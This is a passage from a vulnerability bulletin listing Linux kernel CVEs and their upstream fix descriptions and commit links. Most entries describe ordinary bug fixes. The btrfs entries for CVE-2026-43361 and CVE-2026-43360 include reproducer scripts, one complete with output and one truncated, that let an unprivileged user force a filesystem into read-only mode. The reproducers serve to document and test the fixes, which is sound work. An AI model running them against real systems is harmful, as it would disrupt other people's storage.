[436.537] RIP: 0033:0x7fe5906b6217 [436.538] Code: 0d 00 f7 (...) [436.540] RSP: 002b:00007ffcd87a61f8 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6 [436.541] RAX: 0000000000000000 RBX: 00005618b9ecadc8 RCX: 00007fe5906b6217 [436.541] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 00005618b9ecb100 [436.542] RBP: 0000000000000000 R08: 00007ffcd87a4fe0 R09: 00000000ffffffff [436.544] R10: 0000000000000103 R11: ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43338 | https://git.kernel.org/stable/c/bb6eb33c908edbbb4d92abdc0c6c87f21b4952e8 https://git.kernel.org/stable/c/cf930a651eef6f8d915bf0ccd60c2045974f870c https://git.kernel.org/stable/c/386f5e16a383101a68e195c806b4eedb233cd1d3 https://git.kernel.org/stable/c/f9a4e3015db1aeafbef407650eb8555445ca943e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: comedi: Reinit dev->spinlock between attachments to low-level drivers `struct comedi_device` is the main controlling structure for a COMEDI device created by the COMEDI subsystem. It contains a member `spinlock` containing a spin-lock that is initialized by the COMEDI subsystem, but is reserved for use by a low-level driver attached to the COMEDI device (at least since commit 25436dc9d84f ("Staging: comedi: remove RT code")). Some COMEDI devices (those created on initialization of the COMEDI subsystem when the "comedi.comedi_num_legacy_minors" parameter is non-zero) can be attached to different low-level drivers over their lifetime using the `COMEDI_DEVCONFIG` ioctl command. This can result in inconsistent lock states being reported when there is a mismatch in the spin-lock locking levels used by each low-level driver to which the COMEDI device has been attached. Fix it by reinitializing `dev->spinlock` before calling the low-level driver's `attach` function pointer if `CONFIG_LOCKDEP` is enabled. | 2026-05-08 | not yet calculated | CVE-2026-43340 | https://git.kernel.org/stable/c/3181c34b415c5464be9d34bff3e43ef63b747039 https://git.kernel.org/stable/c/2b1f49e4fdff3ef0f8e9158bbb5b149e06287560 https://git.kernel.org/stable/c/4d5ffe524903a30e2e0da7d16841a56bec2de55c https://git.kernel.org/stable/c/c01bcc67a9a692d65508ebd480405b5e77d562b7 https://git.kernel.org/stable/c/430291d8f3884f57ae0057049b0ca291453e29e1 https://git.kernel.org/stable/c/b89c026227712c367950bbae055a5b31073d3b30 https://git.kernel.org/stable/c/83134a7a176ce5b4b19b6edecf4360e8d98d1a5a https://git.kernel.org/stable/c/4b9a9a6d71e3e252032f959fb3895a33acb5865c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_rndis: Protect RNDIS options with mutex The class/subclass/protocol options are susceptible to race conditions as they can be accessed concurrently through configfs. Use existing mutex to protect these options. This issue was identified during code inspection. | 2026-05-08 | not yet calculated | CVE-2026-43342 | https://git.kernel.org/stable/c/0a75d97c53477a59c0aa1c65f69038c719f9c5b8 https://git.kernel.org/stable/c/c1b3d5b0acb194efe20fc5864ee03439fa7bd45c https://git.kernel.org/stable/c/65b7dbf80a1627667c241fff7c1c224f3118014f https://git.kernel.org/stable/c/cb5316b37288ab8791584e32f114c4f41ad45b67 https://git.kernel.org/stable/c/7d8fa3b8783ab95a46e20d97fbeeede719b2efda https://git.kernel.org/stable/c/446f1842cda929c40d4697722bfdcfb334bc9692 https://git.kernel.org/stable/c/209decd3f7901df9842b83f2540dc8685e344a07 https://git.kernel.org/stable/c/8d8c68b1fc06ece60cf43e1306ff0f4ac121547e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_subset: Fix unbalanced refcnt in geth_free geth_alloc() increments the reference count, but geth_free() fails to decrement it. This prevents the configuration of attributes via configfs after unlinking the function. Decrement the reference count in geth_free() to ensure proper cleanup. | 2026-05-08 | not yet calculated | CVE-2026-43343 | https://git.kernel.org/stable/c/a932b171554714b1bca313b853c7aa9f2930f9aa https://git.kernel.org/stable/c/d7d702407b61e96286a15b6e715572f541a8d41c https://git.kernel.org/stable/c/3f5bfc550a40d7493b1cf09540ed6b412b3b82be https://git.kernel.org/stable/c/75776a055b656873319c3830fed471daef3ceb23 https://git.kernel.org/stable/c/cc8ec610cd14c093a19371691a7ce1ee5421e829 https://git.kernel.org/stable/c/3d436670b47415da042452618fb5d8e317ab095f https://git.kernel.org/stable/c/23e4851ce348a329d974e84e828155dda9f52122 https://git.kernel.org/stable/c/caa27923aacd8a5869207842f2ab1657c6c0c7bc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/x86/intel/uncore: Fix die ID init and look up bugs In snbep_pci2phy_map_init(), in the nr_node_ids > 8 path, uncore_device_to_die() may return -1 when all CPUs associated with the UBOX device are offline. Remove the WARN_ON_ONCE(die_id == -1) check for two reasons: - The current code breaks out of the loop. This is incorrect because pci_get_device() does not guarantee iteration in domain or bus order, so additional UBOX devices may be skipped during the scan. - Returning -EINVAL is incorrect, since marking offline buses with die_id == -1 is expected and should not be treated as an error. Separately, when NUMA is disabled on a NUMA-capable platform, pcibus_to_node() returns NUMA_NO_NODE, causing uncore_device_to_die() to return -1 for all PCI devices. As a result, spr_update_device_location(), used on Intel SPR and EMR, ignores the corresponding PMON units and does not add them to the RB tree. Fix this by using uncore_pcibus_to_dieid(), which retrieves topology from the UBOX GIDNIDMAP register and works regardless of whether NUMA is enabled in Linux. This requires snbep_pci2phy_map_init() to be added in spr_uncore_pci_init(). Keep uncore_device_to_die() only for the nr_node_ids > 8 case, where NUMA is expected to be enabled. | 2026-05-08 | not yet calculated | CVE-2026-43344 | https://git.kernel.org/stable/c/6a5dc3ee97581da2907fc7acd62853f07184de67 https://git.kernel.org/stable/c/a16d1ec4dd0cdcf689f324adde6067083bce9099 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ice: ptp: don't WARN when controlling PF is unavailable In VFIO passthrough setups, it is possible to pass through only a PF which doesn't own the source timer. In that case the PTP controlling PF (adapter->ctrl_pf) is never initialized in the VM, so ice_get_ctrl_ptp() returns NULL and triggers WARN_ON() in ice_ptp_setup_pf(). Since this is an expected behavior in that configuration, replace WARN_ON() with an informational message and return -EOPNOTSUPP. | 2026-05-08 | not yet calculated | CVE-2026-43346 | https://git.kernel.org/stable/c/e19675b384e9dcaca1bd5e4a67b8ad136eccfbe8 https://git.kernel.org/stable/c/c73f365707d3b1b78b7d16e1f029020d1ae50d0f https://git.kernel.org/stable/c/bb3f21edc7056cdf44a7f7bd7ba65af40741838c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mshv_vtl: Fix vmemmap_shift exceeding MAX_FOLIO_ORDER When registering VTL0 memory via MSHV_ADD_VTL0_MEMORY, the kernel computes pgmap->vmemmap_shift as the number of trailing zeros in the OR of start_pfn and last_pfn, intending to use the largest compound page order both endpoints are aligned to. However, this value is not clamped to MAX_FOLIO_ORDER, so a sufficiently aligned range (e.g. physical range [0x800000000000, 0x800080000000), corresponding to start_pfn=0x800000000 with 35 trailing zeros) can produce a shift larger than what memremap_pages() accepts, triggering a WARN and returning -EINVAL: WARNING: ... memremap_pages+0x512/0x650 requested folio size unsupported The MAX_FOLIO_ORDER check was added by commit 646b67d57589 ("mm/memremap: reject unreasonable folio/compound page sizes in memremap_pages()"). Fix this by clamping vmemmap_shift to MAX_FOLIO_ORDER so we always request the largest order the kernel supports, in those cases, rather than an out-of-range value. Also fix the error path to propagate the actual error code from devm_memremap_pages() instead of hard-coding -EFAULT, which was masking the real -EINVAL return. | 2026-05-08 | not yet calculated | CVE-2026-43348 | https://git.kernel.org/stable/c/a142ca4b6481e71498712800b20e0c0fcf02843b https://git.kernel.org/stable/c/404cd6bffe17e25e0f94ed2775ffdd6cd10ac3fd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to avoid uninit-value access in f2fs_sanity_check_node_footer syzbot reported a f2fs bug as below: BUG: KMSAN: uninit-value in f2fs_sanity_check_node_footer+0x374/0xa20 fs/f2fs/node.c:1520 f2fs_sanity_check_node_footer+0x374/0xa20 fs/f2fs/node.c:1520 f2fs_finish_read_bio+0xe1e/0x1d60 fs/f2fs/data.c:177 f2fs_read_end_io+0x6ab/0x2220 fs/f2fs/data.c:-1 bio_endio+0x1006/0x1160 block/bio.c:1792 submit_bio_noacct+0x533/0x2960 block/blk-core.c:891 submit_bio+0x57a/0x620 block/blk-core.c:926 blk_crypto_submit_bio include/linux/blk-crypto.h:203 [inline] f2fs_submit_read_bio+0x12c/0x360 fs/f2fs/data.c:557 f2fs_submit_page_bio+0xee2/0x1450 fs/f2fs/data.c:775 read_node_folio+0x384/0x4b0 fs/f2fs/node.c:1481 __get_node_folio+0x5db/0x15d0 fs/f2fs/node.c:1576 f2fs_get_inode_folio+0x40/0x50 fs/f2fs/node.c:1623 do_read_inode fs/f2fs/inode.c:425 [inline] f2fs_iget+0x1209/0x9380 fs/f2fs/inode.c:596 f2fs_fill_super+0x8f5a/0xb2e0 fs/f2fs/super.c:5184 get_tree_bdev_flags+0x6e6/0x920 fs/super.c:1694 get_tree_bdev+0x38/0x50 fs/super.c:1717 f2fs_get_tree+0x35/0x40 fs/f2fs/super.c:5436 vfs_get_tree+0xb3/0x5d0 fs/super.c:1754 fc_mount fs/namespace.c:1193 [inline] do_new_mount_fc fs/namespace.c:3763 [inline] do_new_mount+0x885/0x1dd0 fs/namespace.c:3839 path_mount+0x7a2/0x20b0 fs/namespace.c:4159 do_mount fs/namespace.c:4172 [inline] __do_sys_mount fs/namespace.c:4361 [inline] __se_sys_mount+0x704/0x7f0 fs/namespace.c:4338 __x64_sys_mount+0xe4/0x150 fs/namespace.c:4338 x64_sys_call+0x39f0/0x3ea0 arch/x86/include/generated/asm/syscalls_64.h:166 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0x134/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f The root cause is: in f2fs_finish_read_bio(), we may access uninit data in folio if we failed to read the data from device into folio, let's add a check condition to avoid such issue. | 2026-05-08 | not yet calculated | CVE-2026-43349 | https://git.kernel.org/stable/c/59970b2586fef4b13e96527b9d232bed30b640cd https://git.kernel.org/stable/c/a10b89343d41ceee1af0ec38d3a74e526c77fa09 https://git.kernel.org/stable/c/7b9161a605e91d0987e2596a245dc1f21621b23f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: Eagerly init vgic dist/redist on vgic creation If vgic_allocate_private_irqs_locked() fails for any odd reason, we exit kvm_vgic_create() early, leaving dist->rd_regions uninitialised. kvm_vgic_dist_destroy() then comes along and walks into the weeds trying to free the RDs. Got to love this stuff. Solve it by moving all the static initialisation early, and make sure that if we fail halfway, we're in a reasonable shape to perform the rest of the teardown. While at it, reset the vgic model on failure, just in case... | 2026-05-08 | not yet calculated | CVE-2026-43351 | https://git.kernel.org/stable/c/b7493f48c3dba75674a4ee505b4afa8fe5102457 https://git.kernel.org/stable/c/a24f1d80fbcdbf8b2a7044a00fa12b3972b4c31c https://git.kernel.org/stable/c/ac6769c8f948dff33265c50e524aebf9aa6f1be0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: proximity: hx9023s: Protect against division by zero in set_samp_freq Avoid division by zero when sampling frequency is unspecified. | 2026-05-08 | not yet calculated | CVE-2026-43354 | https://git.kernel.org/stable/c/451ec5e67444f8460f9706a1bde146b5bbc86ce6 https://git.kernel.org/stable/c/ad9da7d39cecd3e92f54149ea0ebca390f33fe69 https://git.kernel.org/stable/c/739fdfe65678d8e5dcf59496c56b32ab3ba3dbaa https://git.kernel.org/stable/c/a318cfc0853706f1d6ce682dba660bc455d674ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: light: bh1780: fix PM runtime leak on error path Move pm_runtime_put_autosuspend() before the error check to ensure the PM runtime reference count is always decremented after pm_runtime_get_sync(), regardless of whether the read operation succeeds or fails. | 2026-05-08 | not yet calculated | CVE-2026-43355 | https://git.kernel.org/stable/c/1eb3af4f59e09323788860a9155e9766b12891e5 https://git.kernel.org/stable/c/424bf90e87134effe4bd932608a15286493b11ab https://git.kernel.org/stable/c/fc77e0a5600e620a2ae51ec78933162fb217b20b https://git.kernel.org/stable/c/aae572ddc28578af476cce7da3faec0395ef0bf0 https://git.kernel.org/stable/c/33661bfc85c14836bfef4425a74b0ca2df4bb5ad https://git.kernel.org/stable/c/dd72e6c3cdea05cad24e99710939086f7a113fb5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: imu: adis: Fix NULL pointer dereference in adis_init The adis_init() function dereferences adis->ops to check if the individual function pointers (write, read, reset) are NULL, but does not first check if adis->ops itself is NULL. Drivers like adis16480, adis16490, adis16545 and others do not set custom ops and rely on adis_init() assigning the defaults. Since struct adis is zero-initialized by devm_iio_device_alloc(), adis->ops is NULL when adis_init() is called, causing a NULL pointer dereference: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000 pc : adis_init+0xc0/0x118 Call trace: adis_init+0xc0/0x118 adis16480_probe+0xe0/0x670 Fix this by checking if adis->ops is NULL before dereferencing it, falling through to assign the default ops in that case. | 2026-05-08 | not yet calculated | CVE-2026-43356 | https://git.kernel.org/stable/c/ba19dd366528b961430f5195c2e382420703074f https://git.kernel.org/stable/c/1a48f94c63a078e7b6a2e59a637fc0858dc6510c https://git.kernel.org/stable/c/9990cd4f8827bd1ae3fb6eb7407630d8d463c430 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: gyro: mpu3050-core: fix pm_runtime error handling The return value of pm_runtime_get_sync() is not checked, allowing the driver to access hardware that may fail to resume. The device usage count is also unconditionally incremented. Use pm_runtime_resume_and_get() which propagates errors and avoids incrementing the usage count on failure. In preenable, add pm_runtime_put_autosuspend() on set_8khz_samplerate() failure since postdisable does not run when preenable fails. | 2026-05-08 | not yet calculated | CVE-2026-43357 | https://git.kernel.org/stable/c/935f57dd43492240e1ca220dd065d624efece6be https://git.kernel.org/stable/c/8544c488e50206f00630a8bbba43d2c8bd290345 https://git.kernel.org/stable/c/35f54e7bcb1eccdc6e5bff06580eeef2e0ff3677 https://git.kernel.org/stable/c/2a86a396aa001a9f9ba2d37dda36573a76f17c90 https://git.kernel.org/stable/c/66c0d1d600e7be034959cf49edab104cb5a39258 https://git.kernel.org/stable/c/42685cf96e28262e0b84d74447f3d99f3f6a72e0 https://git.kernel.org/stable/c/7a3dec5b265cf87678b10c98a72a435a8e769bb7 https://git.kernel.org/stable/c/acc3949aab3e8094641a9c7c2768de1958c88378 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: add missing RCU unlock in error path in try_release_subpage_extent_buffer() Call rcu_read_lock() before exiting the loop in try_release_subpage_extent_buffer() because there is a rcu_read_unlock() call past the loop. This has been detected by the Clang thread-safety analyzer. | 2026-05-08 | not yet calculated | CVE-2026-43358 | https://git.kernel.org/stable/c/5e1ab71f74a1e61f1254dff128a764fdebaec0b8 https://git.kernel.org/stable/c/35b0c8768e848e1b7e32052db36b5fa59b6a33a1 https://git.kernel.org/stable/c/b2840e33127ce0eea880504b7f133e780f567a9b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix transaction abort on set received ioctl due to item overflow If the set received ioctl fails due to an item overflow when attempting to add the BTRFS_UUID_KEY_RECEIVED_SUBVOL we have to abort the transaction since we did some metadata updates before. This means that if a user calls this ioctl with the same received UUID field for a lot of subvolumes, we will hit the overflow, trigger the transaction abort and turn the filesystem into RO mode. A malicious user could exploit this, and this ioctl does not even require that a user has admin privileges (CAP_SYS_ADMIN), only that he/she owns the subvolume. Fix this by doing an early check for item overflow before starting a transaction. This is also race safe because we are holding the subvol_sem semaphore in exclusive (write) mode. A test case for fstests will follow soon. | 2026-05-08 | not yet calculated | CVE-2026-43359 | https://git.kernel.org/stable/c/b9914db13ac15aca3b74544c0bb1a2e0dad1f174 https://git.kernel.org/stable/c/b19c0465e4daad5aa8f60552ea0578cf31a11b1e https://git.kernel.org/stable/c/2e57b8cac2ba0d38aac76c1ecdfd8b899e3581a5 https://git.kernel.org/stable/c/d11aefe654a04fc41996d254748d6a38b6b0a7be https://git.kernel.org/stable/c/41fb97353ff58fa4f31904c343fc8e3df2f7517d https://git.kernel.org/stable/c/87f2c46003fce4d739138aab4af1942b1afdadac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix transaction abort on file creation due to name hash collision If we attempt to create several files with names that result in the same hash, we have to pack them in same dir item and that has a limit inherent to the leaf size. However if we reach that limit, we trigger a transaction abort and turns the filesystem into RO mode. This allows for a malicious user to disrupt a system, without the need to have administration privileges/capabilities. Reproducer: $ cat exploit-hash-collisions.sh #!/bin/bash DEV=/dev/sdi MNT=/mnt/sdi # Use smallest node size to make the test faster and require fewer file # names that result in hash collision. mkfs.btrfs -f --nodesize 4K $DEV mount $DEV $MNT # List of names that result in the same crc32c hash for btrfs. declare -a names=( ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43360 | https://git.kernel.org/stable/c/36947b5200b89bbe3a63629c12d4b31c84c0af9f https://git.kernel.org/stable/c/64ad49597d14c495ab8b7933bfefc83936a598e4 https://git.kernel.org/stable/c/5e2ea10b800d1bbb95e0c01a83f4f8119ac5d688 https://git.kernel.org/stable/c/9273175bf16c83f3ec93aa242d78c9b5db452d4d https://git.kernel.org/stable/c/0625e564290450c1921b115fc3d9abef74e055bd https://git.kernel.org/stable/c/2d1ababdedd4ba38867c2500eb7f95af5ddeeef7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix transaction abort when snapshotting received subvolumes Currently a user can trigger a transaction abort by snapshotting a previously received snapshot a bunch of times until we reach a BTRFS_UUID_KEY_RECEIVED_SUBVOL item overflow (the maximum item size we can store in a leaf). This is very likely not common in practice, but if it happens, it turns the filesystem into RO mode. The snapshot, send and set_received_subvol and subvol_setflags (used by receive) don't require CAP_SYS_ADMIN, just inode_owner_or_capable(). A malicious user could use this to turn a filesystem into RO mode and disrupt a system. Reproducer script: $ cat test.sh #!/bin/bash DEV=/dev/sdi MNT=/mnt/sdi # Use smallest node size to make the test faster. mkfs.btrfs -f --nodesize 4K $DEV mount $DEV $MNT # Create a subvolume and set it to RO so that it can be used for send. btrfs subvolume create $MNT/sv touch $MNT/sv/foo btrfs property set $MNT/sv ro true # Send and receive the subvolume into snaps/sv. mkdir $MNT/snaps btrfs send $MNT/sv \| btrfs receive $MNT/snaps # Now snapshot the received subvolume, which has a received_uuid, a # lot of times to trigger the leaf overflow. total=500 for ((i = 1; i <= $total; i++)); do echo -ne "\rCreating snapshot $i/$total" btrfs subvolume snapshot -r $MNT/snaps/sv $MNT/snaps/sv_$i > /dev/null done echo umount $MNT When running the test: $ ./test.sh (...) Create subvolume '/mnt/sdi/sv' At subvol /mnt/sdi/sv At subvol sv Creating snapshot 496/500ERROR: Could not create subvolume: Value too large for defined data type Creating snapshot 497/500ERROR: Could not create subvolume: Read-only file system Creating snapshot 498/500ERROR: Could not create subvolume: Read-only file system Creating snapshot 499/500ERROR: Could not create subvolume: Read-only file system Creating snapshot 500/500ERROR: Could not create subvolume: Read-only file system And in dmesg/syslog: $ dmesg (...) [251067.627338] BTRFS warning (device sdi): insert uuid item failed -75 (0x4628b21c4ac8d898, 0x2598bee2b1515c91) type 252! [251067.629212] ------------[ cut here ]------------ [251067.630033] BTRFS: Transaction aborted (error -75) [251067.630871] WARNING: fs/btrfs/transaction.c:1907 at create_pending_snapshot.cold+0x52/0x465 [btrfs], CPU#10: btrfs/615235 [251067.632851] Modules linked in: btrfs dm_zero (...) [251067.644071] CPU: 10 UID: 0 PID: 615235 Comm: btrfs Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full) [251067.646165] Tainted: [W]=WARN [251067.646733] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014 [251067.648735] RIP: 0010:create_pending_snapshot.cold+0x55/0x465 [btrfs] [251067.649984] Code: f0 48 0f (...) [251067.653313] RSP: 0018:ffffce644908fae8 EFLAGS: 00010292 [251067.653987] RAX: 00000000ffffff01 RBX: ffff8e5639e63a80 RCX: 00000000ffffffd3 [251067.655042] RDX: ffff8e53faa76b00 RSI: 00000000ffffffb5 RDI: ffffffffc0919750 [251067.656077] RBP: ffffce644908fbd8 R08: 0000000000000000 R09: ffffce644908f820 [251067.657068] R10: ffff8e5adc1fffa8 R11: 0000000000000003 R12: ffff8e53c0431bd0 [251067.658050] R13: ffff8e5414593600 R14: ffff8e55efafd000 R15: 00000000ffffffb5 [251067.659019] FS: 00007f2a4944b3c0(0000) GS:ffff8e5b27dae000(0000) knlGS:0000000000000000 [251067.660115] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [251067.660943] CR2: 00007ffc5aa57898 CR3: 00000005813a2003 CR4: 0000000000370ef0 [251067.661972] Call Trace: [251067.662292] <TASK> [251067.662653] create_pending_snapshots+0x97/0xc0 [btrfs] [251067.663413] btrfs_commit_transaction+0x26e/0xc00 [btrfs] [251067.664257] ? btrfs_qgroup_convert_reserved_meta+0x35/0x390 [btrfs] [251067.665238] ? _raw_spin_unlock+0x15/0x30 [251067.665837] ? record_root_ ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43361 | https://git.kernel.org/stable/c/9a9227b488ffb7cdbb5d930a01fc6956c05ba61a https://git.kernel.org/stable/c/6bce705b699cba9afccb996c77d194fe003dfa2a https://git.kernel.org/stable/c/e3d8efc157bc590457d3e31da403af1a221643d6 https://git.kernel.org/stable/c/bac55dde8efa457e769c934fd88a63f2141ba238 https://git.kernel.org/stable/c/770af8e465c2c3de528f85e840eab462dd41542b https://git.kernel.org/stable/c/e1b18b959025e6b5dbad668f391f65d34b39595a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/apic: Disable x2apic on resume if the kernel expects so When resuming from s2ram, firmware may re-enable x2apic mode, which may have been disabled by the kernel during boot either because it doesn't support IRQ remapping or for other reasons. This causes the kernel to continue using the xapic interface, while the hardware is in x2apic mode, which causes hangs. This happens on defconfig + bare metal + s2ram. Fix this in lapic_resume() by disabling x2apic if the kernel expects it to be disabled, i.e. when x2apic_mode = 0. The ACPI v6.6 spec, Section 16.3 [1] says firmware restores either the pre-sleep configuration or initial boot configuration for each CPU, including MSR state: When executing from the power-on reset vector as a result of waking from an S2 or S3 sleep state, the platform firmware performs only the hardware initialization required to restore the system to either the state the platform was in prior to the initial operating system boot, or to the pre-sleep configuration state. In multiprocessor systems, non-boot processors should be placed in the same state as prior to the initial operating system boot. (further ahead) If this is an S2 or S3 wake, then the platform runtime firmware restores minimum context of the system before jumping to the waking vector. This includes: CPU configuration. Platform runtime firmware restores the pre-sleep configuration or initial boot configuration of each CPU (MSR, MTRR, firmware update, SMBase, and so on). Interrupts must be disabled (for IA-32 processors, disabled by CLI instruction). (and other things) So at least as per the spec, re-enablement of x2apic by the firmware is allowed if "x2apic on" is a part of the initial boot configuration. [1] https://uefi.org/specs/ACPI/6.6/16_Waking_and_Sleeping.html#initialization [ bp: Massage. ] | 2026-05-08 | not yet calculated | CVE-2026-43363 | https://git.kernel.org/stable/c/a6ad6f2e31b524cbb66b2f370bad0cf17d327e6c https://git.kernel.org/stable/c/3dd0812a7c764cd8f3b0182441ac22da0a7f3b09 https://git.kernel.org/stable/c/965289b120cc68cca886c75219c68b8c15751d73 https://git.kernel.org/stable/c/f591938072115bf08730b8530c67fab189cc6308 https://git.kernel.org/stable/c/1a85f84214f9d790216547ac6086bf8033cd9e5a https://git.kernel.org/stable/c/11712c4eb384098db4cb08792e223c818b908c1a https://git.kernel.org/stable/c/1d8440c1e7c49715f937416ac90cf260f1f1712c https://git.kernel.org/stable/c/8cc7dd77a1466f0ec58c03478b2e735a5b289b96 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ublk: fix NULL pointer dereference in ublk_ctrl_set_size() ublk_ctrl_set_size() unconditionally dereferences ub->ub_disk via set_capacity_and_notify() without checking if it is NULL. ub->ub_disk is NULL before UBLK_CMD_START_DEV completes (it is only assigned in ublk_ctrl_start_dev()) and after UBLK_CMD_STOP_DEV runs (ublk_detach_disk() sets it to NULL). Since the UBLK_CMD_UPDATE_SIZE handler performs no state validation, a user can trigger a NULL pointer dereference by sending UPDATE_SIZE to a device that has been added but not yet started, or one that has been stopped. Fix this by checking ub->ub_disk under ub->mutex before dereferencing it, and returning -ENODEV if the disk is not available. | 2026-05-08 | not yet calculated | CVE-2026-43364 | https://git.kernel.org/stable/c/f13fe6794726755a43090cb680c4c58cea6aa5f1 https://git.kernel.org/stable/c/c28d945bfa92e15147e93b73f95345b9bec979b0 https://git.kernel.org/stable/c/25966fc097691e5c925ad080f64a2f19c5fd940a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd: Fix a few more NULL pointer dereferences in device cleanup I found a few more paths that cleanup fails due to a NULL version pointer on unsupported hardware. Add NULL checks as applicable. (cherry picked from commit f5a05f8414fc10f307eb965f303580c7778f8dd2) | 2026-05-08 | not yet calculated | CVE-2026-43367 | https://git.kernel.org/stable/c/38f1640db7f8bf57b9e09c5b0b8b205a598f1b3e https://git.kernel.org/stable/c/5edcb0d6729b88f192ec8b0896aaf581e3593c9c https://git.kernel.org/stable/c/72ecb1dae72775fa9fea0159d8445d620a0a2295 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd: Fix NULL pointer dereference in device cleanup When GPU initialization fails due to an unsupported HW block IP blocks may have a NULL version pointer. During cleanup in amdgpu_device_fini_hw, the code calls amdgpu_device_set_pg_state and amdgpu_device_set_cg_state which iterate over all IP blocks and access adev->ip_blocks[i].version without NULL checks, leading to a kernel NULL pointer dereference. Add NULL checks for adev->ip_blocks[i].version in both amdgpu_device_set_cg_state and amdgpu_device_set_pg_state to prevent dereferencing NULL pointers during GPU teardown when initialization has failed. (cherry picked from commit b7ac77468cda92eecae560b05f62f997a12fe2f2) | 2026-05-08 | not yet calculated | CVE-2026-43369 | https://git.kernel.org/stable/c/43025c941aced9a9009f9ff20eea4eb78c61deb8 https://git.kernel.org/stable/c/767cd24d3c4ae847688877def4891943f6611ecd https://git.kernel.org/stable/c/062ea905fff7756b2e87143ffccaece5cdb44267 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: macb: Shuffle the tx ring before enabling tx Quanyang observed that when using an NFS rootfs on an AMD ZynqMp board, the rootfs may take an extended time to recover after a suspend. Upon investigation, it was determined that the issue originates from a problem in the macb driver. According to the Zynq UltraScale TRM [1], when transmit is disabled, the transmit buffer queue pointer resets to point to the address specified by the transmit buffer queue base address register. In the current implementation, the code merely resets `queue->tx_head` and `queue->tx_tail` to '0'. This approach presents several issues: - Packets already queued in the tx ring are silently lost, leading to memory leaks since the associated skbs cannot be released. - Concurrent write access to `queue->tx_head` and `queue->tx_tail` may occur from `macb_tx_poll()` or `macb_start_xmit()` when these values are reset to '0'. - The transmission may become stuck on a packet that has already been sent out, with its 'TX_USED' bit set, but has not yet been processed. However, due to the manipulation of 'queue->tx_head' and 'queue->tx_tail', `macb_tx_poll()` incorrectly assumes there are no packets to handle because `queue->tx_head == queue->tx_tail`. This issue is only resolved when a new packet is placed at this position. This is the root cause of the prolonged recovery time observed for the NFS root filesystem. To resolve this issue, shuffle the tx ring and tx skb array so that the first unsent packet is positioned at the start of the tx ring. Additionally, ensure that updates to `queue->tx_head` and `queue->tx_tail` are properly protected with the appropriate lock. [1] https://docs.amd.com/v/u/en-US/ug1085-zynq-ultrascale-trm | 2026-05-08 | not yet calculated | CVE-2026-43371 | https://git.kernel.org/stable/c/c6783bfa31a59f34fe4feb1bdbf67791ef3fb0b7 https://git.kernel.org/stable/c/0a47c3889fcd843c72aa57fa8c4d06f5801fced4 https://git.kernel.org/stable/c/88f974fe118cb4653f029929ecbca7cfe06132ae https://git.kernel.org/stable/c/58f5d34f88e8f00910b692537f7b2efdb8c3705d https://git.kernel.org/stable/c/403182e0771b250cfde0fe7e1081d095ceaf8230 https://git.kernel.org/stable/c/881a0263d502e1a93ebc13a78254e9ad19520232 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: dsa: microchip: Fix error path in PTP IRQ setup If request_threaded_irq() fails during the PTP message IRQ setup, the newly created IRQ mapping is never disposed. Indeed, the ksz_ptp_irq_setup()'s error path only frees the mappings that were successfully set up. Dispose the newly created mapping if the associated request_threaded_irq() fails at setup. | 2026-05-08 | not yet calculated | CVE-2026-43372 | https://git.kernel.org/stable/c/3704ac6a0d9a78f66a187515a8ca3faedaf01cc5 https://git.kernel.org/stable/c/e80fef36c676c947072dabeb5803ae59d92ba493 https://git.kernel.org/stable/c/6c58a9fdb0d0e1011aa02455d26d6ebea251979b https://git.kernel.org/stable/c/c2d1d41e0e8ec447d40a5752844fc5fb0b23db27 https://git.kernel.org/stable/c/99c8c16a4aad0b37293cae213e15957c573cf79b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: mctp: fix device leak on probe failure Driver core holds a reference to the USB interface and its parent USB device while the interface is bound to a driver and there is no need to take additional references unless the structures are needed after disconnect. This driver takes a reference to the USB device during probe but does not release it on probe failures. Drop the redundant device reference to fix the leak, reduce cargo culting, make it easier to spot drivers where an extra reference is needed, and reduce the risk of further memory leaks. | 2026-05-08 | not yet calculated | CVE-2026-43375 | https://git.kernel.org/stable/c/3224990fb16a831aabc50b67c74f5d0074ce80dd https://git.kernel.org/stable/c/ec9538f9b5cd1db5e8c612aa636b6119b6355c5d https://git.kernel.org/stable/c/224a0d284c3caf1951302d1744a714784febed71 |
